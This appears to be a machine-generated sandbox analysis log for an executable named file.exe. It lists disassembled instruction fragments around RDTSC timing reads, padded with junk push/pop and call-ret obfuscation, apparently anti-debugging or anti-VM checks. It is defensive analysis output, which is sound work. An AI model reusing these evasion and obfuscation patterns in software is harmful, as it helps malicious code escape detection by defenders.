              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11619 second address: A116BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007FF7B0F3BFE4h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push esi 0x00000017 push edi 0x00000018 je 00007FF7B0F3BFC6h 0x0000001e pop edi 0x0000001f pop esi 0x00000020 mov eax, dword ptr [eax] 0x00000022 jnp 00007FF7B0F3BFCEh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop eax 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF7B0F3BFC8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f cld 0x00000050 call 00007FF7B0F3BFC9h 0x00000055 ja 00007FF7B0F3BFD5h 0x0000005b push eax 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007FF7B0F3BFC6h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A116BA second address: A116DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jne 00007FF7B0C9CD46h 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A116DD second address: A11724 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF7B0F3BFD4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jbe 00007FF7B0F3BFD9h 0x00000013 jmp 00007FF7B0F3BFD3h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007FF7B0F3BFCCh 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11724 second address: A1172F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1188B second address: A118AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A118AA second address: A118AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11B0C second address: A11B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A122F7 second address: A12341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FF7B0C9CD48h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2A1Eh] 0x00000028 nop 0x00000029 js 00007FF7B0C9CD53h 0x0000002f push eax 0x00000030 jmp 00007FF7B0C9CD4Bh 0x00000035 pop eax 0x00000036 push eax 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A124E6 second address: A124F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FF7B0F3BFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1280B second address: A12813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12813 second address: A1282A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF7B0F3BFC6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FF7B0F3BFC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1282A second address: A12830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12830 second address: A12835 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12835 second address: A12844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 clc 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12D7F second address: A12E0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FF7B0F3BFD4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FF7B0F3BFC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FF7B0F3BFC8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 mov esi, dword ptr [ebp+122D17BFh] 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF7B0F3BFD6h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A137BB second address: A137CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF7B0C9CD46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A137CB second address: A137CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A137CF second address: A137D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A152A7 second address: A1531C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FF7B0F3BFC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D3A69h] 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D26BBh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FF7B0F3BFC8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c add esi, 23DE91C4h 0x00000052 xchg eax, ebx 0x00000053 jo 00007FF7B0F3BFDDh 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FF7B0F3BFCBh 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1500F second address: A1502F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF7B0C9CD4Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1531C second address: A15336 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FF7B0F3BFCAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A15336 second address: A1533A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1533A second address: A1533E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1650C second address: A16512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16512 second address: A16516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC84C second address: 9CC86E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD58h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1944B second address: A1944F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1944F second address: A194CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FF7B0C9CD48h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FF7B0C9CD48h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007FF7B0C9CD48h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f push ecx 0x00000060 pushad 0x00000061 popad 0x00000062 pop ecx 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D2E5 second address: A1D302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0F3BFD9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E813 second address: A1E81D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D9E8 second address: A1DA0A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0F3BFCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jnl 00007FF7B0F3BFC6h 0x00000013 pop esi 0x00000014 js 00007FF7B0F3BFCCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DAB6 second address: A1DABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA66 second address: A1EA8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA8A second address: A1EA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FA8C second address: A1FAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1EA90 second address: A1EA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF7B0C9CD46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23120 second address: A23124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A22232 second address: A22238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23124 second address: A2315E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a jo 00007FF7B0F3BFC8h 0x00000010 mov ebx, esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FF7B0F3BFC8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A241E4 second address: A241EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A232AE second address: A23335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1246FEB9h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FF7B0F3BFC8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jp 00007FF7B0F3BFCCh 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c movsx ebx, bx 0x0000003f mov eax, dword ptr [ebp+122D0859h] 0x00000045 mov edi, ebx 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007FF7B0F3BFC8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 or dword ptr [ebp+124643F6h], edi 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jo 00007FF7B0F3BFC8h 0x00000072 push edx 0x00000073 pop edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23335 second address: A2333F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2333F second address: A23363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF7B0F3BFD9h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A23363 second address: A23369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2500E second address: A2508B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FF7B0F3BFC6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jno 00007FF7B0F3BFE0h 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D2A00h], ebx 0x0000001a sub edi, dword ptr [ebp+122D3875h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FF7B0F3BFC8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c pushad 0x0000003d pushad 0x0000003e mov ah, BDh 0x00000040 and esi, dword ptr [ebp+122D3765h] 0x00000046 popad 0x00000047 mov esi, ebx 0x00000049 popad 0x0000004a push 00000000h 0x0000004c sub ebx, dword ptr [ebp+122D2A00h] 0x00000052 push eax 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push esi 0x00000057 pop esi 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25207 second address: A2520B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2520B second address: A25295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov di, 2F95h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FF7B0F3BFC8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov eax, dword ptr [ebp+122D0371h] 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007FF7B0F3BFC8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov bx, ax 0x00000056 push FFFFFFFFh 0x00000058 mov dword ptr [ebp+122D2A00h], edi 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 jmp 00007FF7B0F3BFD8h 0x00000067 jl 00007FF7B0F3BFC6h 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25295 second address: A2529B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2529B second address: A2529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2529F second address: A252A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26231 second address: A26235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26235 second address: A2623B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2623B second address: A2623F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F39 second address: A28F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28F3D second address: A28F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF7B0F3BFC8h 0x0000000c push edi 0x0000000d jmp 00007FF7B0F3BFD3h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jmp 00007FF7B0F3BFCCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF7B0F3BFD9h 0x00000029 je 00007FF7B0F3BFC6h 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2957D second address: A29601 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FF7B0C9CD52h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FF7B0C9CD48h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push esi 0x00000029 cld 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D1C39h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF7B0C9CD48h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f call 00007FF7B0C9CD4Bh 0x00000054 xor bx, C902h 0x00000059 pop edi 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007FF7B0C9CD4Ch 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A56B second address: A2A570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A570 second address: A2A57A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF7B0C9CD46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B38F second address: A2B393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B393 second address: A2B3A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FF7B0C9CD46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B440 second address: A2B446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B446 second address: A2B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FF7B0C9CD46h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B457 second address: A2B45B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B45B second address: A2B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2A67E second address: A2A726 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e adc ebx, 14ED5439h 0x00000014 mov edi, ecx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e jmp 00007FF7B0F3BFCDh 0x00000023 jc 00007FF7B0F3BFCCh 0x00000029 mov dword ptr [ebp+12450BD7h], ecx 0x0000002f popad 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov dword ptr [ebp+122D2940h], edx 0x0000003d mov eax, dword ptr [ebp+122D0889h] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007FF7B0F3BFC8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov di, dx 0x00000060 push FFFFFFFFh 0x00000062 and ebx, dword ptr [ebp+122D1C60h] 0x00000068 nop 0x00000069 jo 00007FF7B0F3BFD0h 0x0000006f pushad 0x00000070 jns 00007FF7B0F3BFC6h 0x00000076 push edx 0x00000077 pop edx 0x00000078 popad 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FF7B0F3BFD9h 0x00000082 rdtsc
